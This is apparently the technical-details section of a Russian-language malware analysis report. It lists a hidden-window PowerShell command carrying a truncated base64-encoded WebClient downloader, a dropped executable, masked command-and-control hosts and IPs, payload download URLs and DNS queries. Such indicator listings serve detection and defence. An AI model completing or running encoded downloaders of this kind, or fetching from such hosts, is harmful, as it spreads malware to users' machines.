Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABWAF8AOAAxADcAMwAxAD0AKAAnAFcAJwArACcAXwAzADAANgAyACcAKwAnADYAJwApADsAJAByAF8AMAA1ADcAXwA3AD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAFQANAA4ADQAXwA1ADMAPQAoAC...
- %HOMEPATH%\937.exe
- %HOMEPATH%\937.exe
- 'kh##ep.com':80
- '10#.#1.22.51':80
- '18.##7.96.49':80
- '16#.#43.254.239':80
- http://kh##ep.com/I2TSaRa
- http://10#.#1.22.51/wp-content/uploads/ZEgGVHJS
- DNS ASK kh##ep.com
- DNS ASK do###icanos.xyz
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABWAF8AOAAxADcAMwAxAD0AKAAnAFcAJwArACcAXwAzADAANgAyACcAKwAnADYAJwApADsAJAByAF8AMAA1ADcAXwA3AD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAFQANAA4ADQAXwA1ADMAPQAoAC...' (со скрытым окном)